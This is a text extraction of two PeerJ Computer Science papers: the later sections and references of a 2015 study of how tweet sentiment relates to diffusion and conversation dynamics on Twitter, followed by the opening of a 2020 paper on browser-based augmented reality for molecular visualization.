axes represent, respectively, the proportion of tweets occurring before and after the peak of popularity of a given discussion. Different colors represent different classes: anticipatory discussions (blue dots), unexpected events (green), symmetric discussions (red), transient events (black). (B) shows the BIC scores of different number of mixture components for the GMM (the lower the BIC the better the GMM captures the data). The star identifies the optimal number of mixtures, four, best captured by the full model. public tweets), and exclusive ones are defined as those whose hashtag never appeared in the previous (August 2014) and the next (October 2014) month. Inspired by previous studies that aimed at finding how many types of different conversations occur on Twitter (Kwak et al., 2010; Lehmann et al., 2012), we characterize our discussions according to three features: the proportion pb of tweets produced within the conversation before its peak, the proportion pd of tweets produced during the peak, and finally the proportion pa of tweets produced after the peak. The peak of popularity of the conversation is simply the day which exhibits the maximum number of tweets with that given hashtag. We use the Expectation Maximization (EM) algorithm to learn an optimal Gaussian Mixture Model (GMM) in the (pb,pa) space. To determine the appropriate number of components (i.e., the number of types of conversations), we adopt three GMM models (spherical, diagonal, and full) and perform a 5-fold cross-validation using the Bayesian Information Criterion (BIC) as quality measure. We vary the number of components from 1 to 6. Figure 3B shows the BIC scores for different number of mixtures: the lower the BIC score, the better. The outcome of this process determines that the optimal number of components is four, in agreement with previous studies (Lehmann et al., 2012), as captured the best by the full GMM model. In Fig. 3A we show the optimal Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 6/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 Figure 4 Example of four types of Twitter conversations reflecting the respective dynamical classes in our dataset. (A) shows one example of anticipatory discussion (#TENNvsOU); (B) an unexpected event (#MileyPor40Principales); (C) a symmetric discussion (#PrayForRise); and (D) a transient event (#KDWBmeetEd). GMM that identifies the four classes of conversation: the two dimensions represent the proportion pb of tweets occurring before (y axis) and pa after (x axis) the peak of popularity of each conversation. The four classes correspond to: (i) anticipatory discussions (blue dots), (ii) unexpected events (green), (iii) symmetric discussions (red), and (iv) transient events (black). Antici- patory conversations (blue) exhibit most of the activity before and during the peak. These discussions build up over time registering an anticipatory behavior of the audience, and quickly fade out after the peak. The complementary behavior is exhibited by discussions around unexpected events (green dots): the peak is reached suddenly as a reaction to some exogenous event, and the discussion quickly decays afterwards. Symmetric discussions (red dots) are characterized by a balanced number of tweets produced before, during, and after the peak time. Finally, transient discussions (black dots) are typically bursty but short events that gather a lot of attention, yet immediately phase away afterwards. According to this classification, out of 1,522 active and exclusive conversations (hashtags) observed in September 2014, we obtained 64 hashtags of class A (anticipatory), 156 of class B (unexpected), 56 of class C (symmetric), and 1,246 of class D (transient), respectively. Figure 4 shows examples representing the four dynamical classes of conversations registered in our dataset. The conversation lengths are all set to 7 days, and centered at the peak day (time window 0). Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 7/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 Figure 4A represents an example of anticipatory discussion: the event captured (#TEN- NvsOU) is the football game Tennessee Volunteers vs. Oklahoma Sooners of Sept. 13, 2014. The anticipatory nature of the discussion is captured by the increasing amount of tweets generated before the peak (time window 0) and by the drastic drop afterwards. Figure 4B shows an example (#MileyPor40Principales) of discussion around an unexpected event, namely the release by Los 40 Principales of an exclusive interview to Miley Cyrus, on Sept. 10, 2014. There is no activity before the peak point, that is reached immediately the day of the news release, and after that the volume of discussion decreases rapidly. Figure 4C represents the discussion of a symmetric event: #PrayForRise was a hashtag adopted to support RiSe, the singer of the K-pop band Ladies’ Code, who was involved in a car accident that eventually caused her death. The symmetric activity of the discussion perfectly reflects the events1: the discussion starts the day of the accident, on September 3, 2014, and peaks 1 Wikipedia: Ladies’ Code— http://en. wikipedia.org/wiki/Ladies%27 Code. the day of RiSe’s death (after four days from the accident, on September 7, 2014), but the fans’ conversation stays alive to commemorate her for several days afterwards. Lastly, Fig. 4D shows one example (#KDWBmeetEd) of transient event, namely the radio station KDWB announcing a lottery drawing of the tickets for Ed Sheeran’s concert, on Sept. 15, 2014. The hype is momentarily and the discussion fades away immediately after the lottery is concluded. Figure 5 shows the evolution of sentiment for the four classes of Twitter conversations: it can be useful to remind the average proportions of neutral (42.46%), positive (35.95%), and negative (21.59%) sentiments in our dataset, to compare them against the distributions for popular discussions. Also worth noting, although each discussion is hard-cast in a class (anticipatory, unexpected, symmetric, or transient), sometimes spurious content might appear before or after the peak, causing the presence of some small amount of tweets where ideally we would not expect any (for example, some tweets appear after the peak of an anticipatory discussion). We grayed out the bars in Figs. 5A, 5B and 5D, to represent non-significant amounts of tweets that are present only as byproduct of averaging across all conversations belonging to each specific class. These intervals therefore do not convey any statistically significant information and are disregarded. (A) For anticipatory events, the amount of positive sentiment grows steadily until the peak time, while the negative sentiment is somewhat constant throughout the entire anticipatory phase. Notably, the amount of negative content is much below the dataset average, fluctuating between 9% and 12% (almost half of the dataset average), while the positive content is well above average, ranging between 40% and 44%. This suggests that, in general, anticipatory popular conversations are emotionally positive. (B) The class of unexpected events intuitively carries more negative sentiment, that stays constant throughout the entire discussion period to levels of the dataset average. (C) Symmetric popular discussions are characterized by a steadily decreasing negative emotions, that goes from about 23% (above dataset’s average) at the inception of the discussions, to around 12% toward the end of the conversations. Complementary behavior happens for positive emotions, that start around 35% (equal to the dataset average) and steadily grow up to 45% toward the end. This suggests that in symmetric conversations there is a general Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 8/15 https://peerj.com/computer-science/ http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://en.wikipedia.org/wiki/Ladies%27_Code http://dx.doi.org/10.7717/peerj-cs.26 Figure 5 Evolution of positive and negative sentiment for different types of Twitter conversations. The four panels show the average distribution of tweet proportion, and the average positive (S ≥ 1) and negative (S ≤ −1) tweet proportions, for the four classes respectively: (A) anticipatory discussion; (B) unexpected event; (C) symmetric discussion; and, (D) transient discussion. shift of emotions toward positiveness over time. (D) Finally, transient events, due to their short-lived lengths, represent more the average discussions, although they exhibit lower levels of negative sentiments (around 15%) and higher levels of positive ones (around 40%) with respect to the dataset’s averages. DISCUSSION The ability to computationally annotate at scale the emotional value of short pieces of text, like tweets, allowed us to investigate the role that emotions and sentiment expressed into social media content plays with respect to the diffusion of such information. Our first finding in this study sheds light on how sentiment correlates with the speed and the reach of the diffusion process: tweets with negative emotional valence spread faster than neutral and positive ones. In particular, the time that passes between the publication of the original post and the first retweet is almost twice as much, on average, for positive tweets than for negative ones. This might be interpreted in a number of ways, the most likely being that content that conveys negative sentiments trigger stronger reactions in the readers, some of which might be more prone to share that piece of information with higher chance than any neutral or positive content. However, the positivity bias (or Pollyanna effect) (Garcia, Garas & Schweitzer, 2012; Boucher & Osgood, 1969) rapidly kicks in when Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 9/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 we analyze how many times the tweets become retweeted or favorited: individuals online clearly tend to prefer positive tweets, which are favorited as much as five times more than negative or neutral ones; the same holds true for the amount of retweets collected by positive posts, which is up to 2.5 times more than negative or neutral ones. These insights provide some clear directives in terms of best practices to produce popular content: if one aims at triggering a quick reaction, negative sentiments outperform neutral or positive emotions. This is the reason why, for example, in cases of emergencies and disasters, misinformation and fear spread so fast in online environments (Ferrara et al., 2014). However, if one aims at long-lasting diffusion, then positive content ensures wide reach and the most preferences. The second part of our study focuses on entire conversations, and investigates how different sentiment patterns emerge from discussions characterized by different temporal signatures (Kwak et al., 2010; Lehmann et al., 2012): we discover that, in general, highly-anticipated events are characterized by positive sentiment, while unexpected events are often harbingers of negative emotions; yet, transient events, whose duration is very brief, represent the norm on social media like Twitter and are not characterized by any particular emotional valence. These results might sound unsurprising, yet they have not been observed before: common sense would suggest, for example, that unprecedented conversations often relate to unexpected events, such as disasters, emergencies, etc., that canalize vast negative emotions from the audience, including fear, sorrow, grief, etc. (Sakaki, Okazaki & Matsuo, 2010). Anticipated conversations instead characterize events that will occur in the foreseeable future, such as a political election, a sport match, a movie release, an entertainment event, or a recurring festivity: such events are generally positively received, yet the attention toward them quickly phases out after their happening (Lehmann et al., 2012; Mestyán, Yasseri & Kertész, 2013; Le, Ferrara & Flammini, 2015). Elections and sport events might represent special cases, as they might open up room for debate, “flames”, polarized opinions, etc. (Ratkiewicz et al., 2011; Bond et al., 2012) (such characteristics have indeed been exploited to make predictions (Asur & Huberman, 2010; Metaxas & Mustafaraj, 2012; Le, Ferrara & Flammini, 2015)). The findings of this paper have very practical consequences that are relevant both for economic and social impact: understanding the dynamics of information diffusion and the effect of sentiment on such phenomena becomes crucial if one, for example, wants to craft a policy to effectively communicate with an audience. The applications range from advertisement and marketing, to public policy and emergency management. Recent events, going for tragic episodes of terrorism, to the emergence of pandemics like Ebola, have highlighted once again how central social media are in the timely diffusion of information, yet how dangerous they can be when they are abused or misused to spread misinformation or fear. Our contribution pushes forward previous studies on sentiment and information diffusion (Dang-Xuan & Stieglitz, 2012) and furthers our understanding of how the emotions expressed in a short piece of text might correlated with its spreading in online social ecosystems, helping to craft effective information diffusion strategies that account for the emotional valence of the content. Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 10/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.26 ACKNOWLEDGEMENTS EF is grateful to Filippo Menczer, YY Ahn, Sune Lehmann, and Johan Bollen for interesting discussions, and to Alessandro Flammini and Lorenzo Coviello for their precious feedback on the project and extensive comments on the manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding EF was partly supported by ONR grant no. N15A-020-0053. ZY was partly supported by NSF grant no. IIS-0811994. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: ONR: N15A-020-0053. NSF: IIS-0811994. Competing Interests The authors declare there are no competing interests. Author Contributions • Emilio Ferrara conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Zeyao Yang performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work. Data Availability The following information was supplied regarding data availability: Data was collected through the public Twitter API (https://dev.twitter.com/overview/ api). To comply with Twitter terms of service, data cannot be publicly shared. Interested future researchers may reproduce the experiments by following the procedure described in the paper. Anonymized data may be available upon request from Dr. Emilio Ferrara (ferrarae@isi.edu). REFERENCES Akkaya C, Wiebe J, Mihalcea R. 2009. Subjectivity word sense disambiguation. In: Proceedings of the 2009 conference on empirical methods in natural language processing. ACL, 190–199. Anderson A, Huttenlocher D, Kleinberg J, Leskovec J. 2012. Effects of user similarity in social media. In: Proceedings of the fifth ACM international conference on web search and data mining. ACM, 703–712. Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 11/15 https://peerj.com/computer-science/ https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api https://dev.twitter.com/overview/api http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://ferrarae@isi.edu http://dx.doi.org/10.7717/peerj-cs.26 Aral S, Muchnik L, Sundararajan A. 2009. Distinguishing influence-based contagion from homophily-driven diffusion in dynamic networks. Proceedings of the National Academy of Sciences of the United States of America 106(51):21544–21549 DOI 10.1073/pnas.0908800106. Aral S, Walker D. 2012. Identifying influential and susceptible members of social networks. Science 337(6092):337–341 DOI 10.1126/science.1215842. Asur S, Huberman BA. 2010. Predicting the future with social media. In: 2010 IEEE/WIC/ACM international conference on web intelligence and intelligent agent technology. IEEE, 492–499. Backstrom L, Kleinberg J. 2014. Romantic partnerships and the dispersion of social ties: a network analysis of relationship status on Facebook. In: Proceedings of the 17th ACM conference on computer supported cooperative work & social computing. ACM, 831–841. Bakshy E, Rosenn I, Marlow C, Adamic L. 2012. The role of social networks in information diffusion. In: Proceedings of the 21st international conference on World Wide Web, 519–528. Bayer M, Sommer W, Schacht A. 2012. Font size matters—emotion and attention in cortical responses to written words. PLoS ONE 7(5):e36042 DOI 10.1371/journal.pone.0036042. Beasley A, Mason W. 2015. Emotional states vs. emotional words in social media. In: 2015 ACM conference on web science. ACM. Berger J. 2011. Arousal increases social transmission of information. Psychological Science 22(7):891–893 DOI 10.1177/0956797611413294. Berger J, Milkman KL. 2012. What makes online content viral? Journal of Marketing Research 49(2):192–205 DOI 10.1509/jmr.10.0353. Bollen J, Mao H, Pepe A. 2011. Modeling public mood and emotion: Twitter sentiment and socio-economic phenomena. In: International AAAI conference on weblogs and social media. AAAI, 450–453. Bollen J, Mao H, Zeng X. 2011. Twitter mood predicts the stock market. Journal of Computational Science 2(1):1–8 DOI 10.1016/j.jocs.2010.12.007. Bond RM, Fariss CJ, Jones JJ, Kramer AD, Marlow C, Settle JE, Fowler JH. 2012. A 61-million-person experiment in social influence and political mobilization. Nature 489(7415):295–298 DOI 10.1038/nature11421. Boucher J, Osgood CE. 1969. The pollyanna hypothesis. Journal of Verbal Learning and Verbal Behavior 8(1):1–8 DOI 10.1016/S0022-5371(69)80002-2. Centola D. 2010. The spread of behavior in an online social network experiment. Science 329(5996):1194–1197 DOI 10.1126/science.1185231. Centola D. 2011. An experimental study of homophily in the adoption of health behavior. Science 334(6060):1269–1272 DOI 10.1126/science.1207055. Cheng J, Adamic L, Dow PA, Kleinberg JM, Leskovec J. 2014. Can cascades be predicted? In: Pro- ceedings of the 23rd international conference on World Wide Web, 925–936. Choudhury MD, Counts S, Gamon M. 2012. Not all moods are created equal! exploring human emotional states in social media. In: International AAAI conference on weblogs and social media, 66–73. Conover MD, Davis C, Ferrara E, McKelvey K, Menczer F, Flammini A. 2013a. The geospatial characteristics of a social movement communication network. PLoS ONE 8(3):e55957 DOI 10.1371/journal.pone.0055957. Conover MD, Ferrara E, Menczer F, Flammini A. 2013b. The digital evolution of Occupy Wall Street. PLoS ONE 8(5):e64679 DOI 10.1371/journal.pone.0064679. Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 12/15 https://peerj.com/computer-science/ http://dx.doi.org/10.1073/pnas.0908800106 http://dx.doi.org/10.1126/science.1215842 http://dx.doi.org/10.1371/journal.pone.0036042 http://dx.doi.org/10.1177/0956797611413294 http://dx.doi.org/10.1509/jmr.10.0353 http://dx.doi.org/10.1016/j.jocs.2010.12.007 http://dx.doi.org/10.1038/nature11421 http://dx.doi.org/10.1016/S0022-5371(69)80002-2 http://dx.doi.org/10.1126/science.1185231 http://dx.doi.org/10.1126/science.1207055 http://dx.doi.org/10.1371/journal.pone.0055957 http://dx.doi.org/10.1371/journal.pone.0064679 http://dx.doi.org/10.7717/peerj-cs.26 Dang-Xuan L, Stieglitz S. 2012. Impact and diffusion of sentiment in political communication-an empirical analysis of political weblogs. In: International AAAI conference on weblogs and social media. AAAI, 427–430. De Meo P, Ferrara E, Fiumara G, Provetti A. 2014. On Facebook, most ties are weak. Communications of the ACM 57(11):78–84 DOI 10.1145/2629438. Ferrara E. 2012. A large-scale community structure analysis in Facebook. EPJ Data Science 1(1):1–30 DOI 10.1140/epjds9. Ferrara E, JafariAsbagh M, Varol O, Qazvinian V, Menczer F, Flammini A. 2013a. Clustering memes in social media. In: 2013 IEEE/ACM international conference on advances in social networks analysis and mining. IEEE, 548–555. Ferrara E, Varol O, Davis C, Menczer F, Flammini A. 2014. The rise of social bots. ArXiv preprint. arXiv:1407.5225. Ferrara E, Varol O, Menczer F, Flammini A. 2013b. Traveling trends: social butterflies or frequent fliers? In: First ACM conference on Online social networks. ACM, 213–222. Ferrara E, Yang Z. 2015. Measuring emotional contagion in social media. ArXiv preprint. arXiv:1506.06021. Garcia D, Garas A, Schweitzer F. 2012. Positive words carry less information than negative words. EPJ Data Science 1(1):1–12 DOI 10.1140/epjds3. Gilbert E, Karahalios K. 2009. Predicting tie strength with social media. In: 27th SIGCHI conference on human factors in computing systems. ACM, 211–220. Golder SA, Macy MW. 2011. Diurnal and seasonal mood vary with work, sleep, and daylength across diverse cultures. Science 333(6051):1878–1881 DOI 10.1126/science.1202775. Gomez Rodriguez M, Leskovec J, Schölkopf B. 2013. Structure and dynamics of information pathways in online media. In: Proceedings of the sixth ACM international conference on Web search and data mining. ACM, 23–32. Harris RB, Paradice D. 2007. An investigation of the computer-mediated communication of emotions. Journal of Applied Sciences Research 3(12):2081–2090. Huberman B, Romero D, Wu F. 2009. Social networks that matter: Twitter under the microscope. First Monday 14(1)1–5. Hutto C, Gilbert E. 2014. Vader: a parsimonious rule-based model for sentiment analysis of social media text. In: International AAAI conference on weblogs and social media, 216–225. Java A, Song X, Finin T, Tseng B. 2007. Why we Twitter: understanding microblogging usage and communities. In: 2007 workshop on web mining and social network analysis, 56–65. Kaplan AM, Haenlein M. 2010. Users of the world, unite! the challenges and opportunities of social media. Business Horizons 53(1):59–68 DOI 10.1016/j.bushor.2009.09.003. Kissler J, Herbert C, Peyk P, Junghofer M. 2007. Buzzwords early cortical responses to emotional words during reading. Psychological Science 18(6):475–480 DOI 10.1111/j.1467-9280.2007.01924.x. Kramer AD, Guillory JE, Hancock JT. 2014. Experimental evidence of massive-scale emotional contagion through social networks. Proceedings of the National Academy of Sciences of the United States of America 111(24):8788–8790 DOI 10.1073/pnas.1320040111. Kwak H, Lee C, Park H, Moon S. 2010. What is Twitter, a social network or a news media? In: Proceedings of the 19th international conference on World Wide Web. ACM, 591–600. Lazer D, Pentland AS, Adamic L, Aral S, Barabasi AL, Brewer D, Christakis N, Contractor N, Fowler J, Gutmann M, Jebara T, King G, Macy M, Roy D, Van Alstyne M. 2009. Life in the network: the coming age of computational social science. Science 323(5915):721–723 DOI 10.1126/science.1167742. Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 13/15 https://peerj.com/computer-science/ http://dx.doi.org/10.1145/2629438 http://dx.doi.org/10.1140/epjds9 http://arxiv.org/abs/1407.5225 http://arxiv.org/abs/1506.06021 http://dx.doi.org/10.1140/epjds3 http://dx.doi.org/10.1126/science.1202775 http://dx.doi.org/10.1016/j.bushor.2009.09.003 http://dx.doi.org/10.1111/j.1467-9280.2007.01924.x http://dx.doi.org/10.1073/pnas.1320040111 http://dx.doi.org/10.1126/science.1167742 http://dx.doi.org/10.7717/peerj-cs.26 Le L, Ferrara E, Flammini A. 2015. On predictability of rare events leveraging social media: a machine learning perspective. In: COSN’15: 2015 ACM SGB conference on online social networks. ACM. Lehmann J, Gonçalves B, Ramasco JJ, Cattuto C. 2012. Dynamical classes of collective attention in Twitter. In: Proceedings of the 21st international conference on World Wide Web. ACM, 251–260. Lerman K, Ghosh R. 2010. Information contagion: an empirical study of the spread of news on Digg and Twitter social networks. In: International AAAI conference on weblogs and social media, vol. 10, 90–97. Mei Q, Ling X, Wondra M, Su H, Zhai C. 2007. Topic sentiment mixture: modeling facets and opinions in weblogs. In: Proceedings of the 16th international conference on World Wide Web. ACM, 171–180. Mestyán M, Yasseri T, Kertész J. 2013. Early prediction of movie box office success based on wikipedia activity big data. PLoS ONE 8(8):e71226 DOI 10.1371/journal.pone.0071226. Metaxas PT, Mustafaraj E. 2012. Social media and the elections. Science 338(6106):472–473 DOI 10.1126/science.1230456. Myers SA, Zhu C, Leskovec J. 2012. Information diffusion and external influence in networks. In: Proceedings of the 18th ACM SIGKDD international conference on Knowledge discovery and data mining. ACM, 33–41. Nagarajan M, Purohit H, Sheth AP. 2010. A qualitative examination of topical tweet and retweet practices. In: International AAAI conference on weblogs and social media, 295–298. Paltoglou G, Thelwall M. 2010. A study of information retrieval weighting schemes for sentiment analysis. In: Proceedings of the 48th annual meeting of the association for computational linguistics. ACL, 1386–1395. Pang B, Lee L. 2008. Opinion mining and sentiment analysis. Foundations and Trends in Information Retrieval 2(1–2):1–135 DOI 10.1561/1500000011. Ratkiewicz J, Conover M, Meiss M, Gonçalves B, Flammini A, Menczer F. 2011. Detecting and tracking political abuse in social media. In: 5th international AAAI conference on weblogs and social media, 297–304. Recuero R, Araujo R, Zago G. 2011. How does social capital affect retweets? In: International AAAI conference on weblogs and social media. Sakaki T, Okazaki M, Matsuo Y. 2010. Earthquake shakes Twitter users: real-time event detection by social sensors. In: 19th international conference on World Wide Web, 851–860. Stieglitz S, Dang-Xuan L. 2013. Emotions and information diffusion in social media—sentiment of microblogs and sharing behavior. Journal of Management Information Systems 29(4):217–248 DOI 10.2753/MIS0742-1222290408. Suh B, Hong L, Pirolli P, Chi EH. 2010. Want to be retweeted? large scale analytics on factors impacting retweet in Twitter network. In: 2010 IEEE 2nd international conference on social computing. IEEE, 177–184. Tang J, Lou T, Kleinberg J. 2012. Inferring social ties across heterogenous networks. In: Proceedings of the fifth ACM international conference on web search and data mining, 743–752. Thelwall M, Buckley K, Paltoglou G. 2011. Sentiment in Twitter events. Journal of the American Society for Information Science and Technology 62(2):406–418 DOI 10.1002/asi.21462. Thelwall M, Buckley K, Paltoglou G, Cai D, Kappas A. 2010. Sentiment strength detection in short informal text. Journal of the American Society for Information Science and Technology 61(12):2544–2558 DOI 10.1002/asi.21416. Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 14/15 https://peerj.com/computer-science/ http://dx.doi.org/10.1371/journal.pone.0071226 http://dx.doi.org/10.1126/science.1230456 http://dx.doi.org/10.1561/1500000011 http://dx.doi.org/10.2753/MIS0742-1222290408 http://dx.doi.org/10.1002/asi.21462 http://dx.doi.org/10.1002/asi.21416 http://dx.doi.org/10.7717/peerj-cs.26 Ugander J, Backstrom L, Marlow C, Kleinberg J. 2012. Structural diversity in social contagion. Proceedings of the National Academy of Sciences of the United States of America 109(16):5962–5966 DOI 10.1073/pnas.1116502109. Varol O, Ferrara E, Ogan CL, Menczer F, Flammini A. 2014. Evolution of online user behavior during a social upheaval. In: 2014 ACM conference on web science. ACM, 81–90. Vespignani A. 2009. Predicting the behavior of techno-social systems. Science 325(5939):425–428 DOI 10.1126/science.1171990. Weng L, Menczer F, Ahn Y-Y. 2013. Virality prediction and community structure in social networks. Scientific Reports 3. Weng L, Menczer F, Ahn Y-Y. 2014. Predicting successful memes using network and community structure. In: 8th international AAAI conference on weblogs and social media. Article 2522. Ferrara and Yang (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.26 15/15 https://peerj.com/computer-science/ http://dx.doi.org/10.1073/pnas.1116502109 http://dx.doi.org/10.1126/science.1171990 http://dx.doi.org/10.7717/peerj-cs.26 Quantifying the effect of sentiment on information diffusion in social media Introduction Materials and Methods Sentiment analysis Data Results The role of sentiment on information diffusion Conversations' dynamics and sentiment evolution Discussion Acknowledgements References work_fpqzfbmakbhbnhu3lmp3xicgzi ---- Building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers Building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers Luciano A. Abriata1,2 1 École Polytechnique Fédérale de Lausanne, Lausanne, Switzerland 2 Swiss Institute of Bioinformatics, Lausanne, Switzerland ABSTRACT For years, immersive interfaces using virtual and augmented reality (AR) for molecular visualization and modeling have promised a revolution in the way how we teach, learn, communicate and work in chemistry, structural biology and related areas. However, most tools available today for immersive modeling require specialized hardware and software, and are costly and cumbersome to set up. These limitations prevent wide use of immersive technologies in education and research centers in a standardized form, which in turn prevents large-scale testing of the actual effects of such technologies on learning and thinking processes. Here, I discuss building blocks for creating marker-based AR applications that run as web pages on regular computers, and explore how they can be exploited to develop web content for handling virtual molecular systems in commodity AR with no more than a webcam- and internet-enabled computer. Examples span from displaying molecules, electron microscopy maps and molecular orbitals with minimal amounts of HTML code, to incorporation of molecular mechanics, real-time estimation of experimental observables and other interactive resources using JavaScript. These web apps provide virtual alternatives to physical, plastic-made molecular modeling kits, where the computer augments the experience with information about spatial interactions, reactivity, energetics, etc. The ideas and prototypes introduced here should serve as starting points for building active content that everybody can utilize online at minimal cost, providing novel interactive pedagogic material in such an open way that it could enable mass-testing of the effect of immersive technologies on chemistry education. Subjects Bioinformatics, Computational Biology, Human-Computer Interaction, Multimedia Keywords Molecular modeling, Integrative modeling, Virtual reality, Augmented reality, Chemistry, Education, Molecular visualization INTRODUCTION For a long time it has been suggested that visual immersive analytics based in virtual reality (VR), augmented reality (AR) and other advanced forms of human-computer interactions have enormous potential in assisting thinking processes in scientific research and in education, especially in areas of science that deal with abstract objects, objects much smaller or larger than human dimensions, objects that are hard to acquire and handle due to high costs, scarcity or fragility, and very large amounts of data (O’Donoghue et al., 2010; Matthews, 2018; Krichenbauer et al., 2018; Sommer et al., 2018). Chemistry and How to cite this article Abriata LA. 2020. Building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers. PeerJ Comput. Sci. 6:e260 DOI 10.7717/peerj-cs.260 Submitted 11 April 2019 Accepted 22 January 2020 Published 17 February 2020 Corresponding author Luciano A. Abriata, luciano.abriata@epfl.ch Academic editor James Procter Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.260 Copyright 2020 Abriata Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.260 mailto:luciano.�abriata@�epfl.�ch https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.260 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ structural biology are examples of such disciplines where AR and VR have been attributed high potential in education and research, by providing hybrid physical/computational interfaces to handle and explore virtual molecules in real 3D space augmented with real-time overlay of information from databases and calculations. However, the actual impact of immersive technologies on teaching, learning and working in chemistry still requires deep evaluation (Fjeld & Voegtli, 2002; Pence, Williams & Belford, 2015; Matthews, 2018; Bach et al., 2018; Yang, Mei & Yue, 2018). Such evaluation has progressed very slowly due to the complex software setups and the specialized hardware needed, which limit availability, reach, adoption, and thus testing. Indeed this limitation is shared more broadly with other potential applications of AR and VR in science, which so far “[…] remain niche tools for scientific research” (Matthews, 2018). In the last decade several groups have been studying ways to achieve immersive environments for chemistry and structural biology using VR and AR (Gillet et al., 2004, 2005; Maier, Tönnis & GudrunKlinker, 2009; Maier & Klinker, 2013; Hirst, Glowacki & Baaden, 2014; Berry & Board, 2014; Martínez-Hung, García-López & Escalona-Arranz, 2016; Vega Garzón, Magrini & Galembeck, 2017; Balo, Wang & Ernst, 2017; Goddard et al., 2018a, 2018b; Wolle, Müller & Rauh, 2018; O’Connor et al., 2018; Ratamero et al., 2018; Müller et al., 2018; Stone, 2019). Such interfaces allow handling molecules over 6 degrees of freedom and with both hands, in immersive 3D. They are expected to overcome the limitations of traditional software based on screen, mouse and 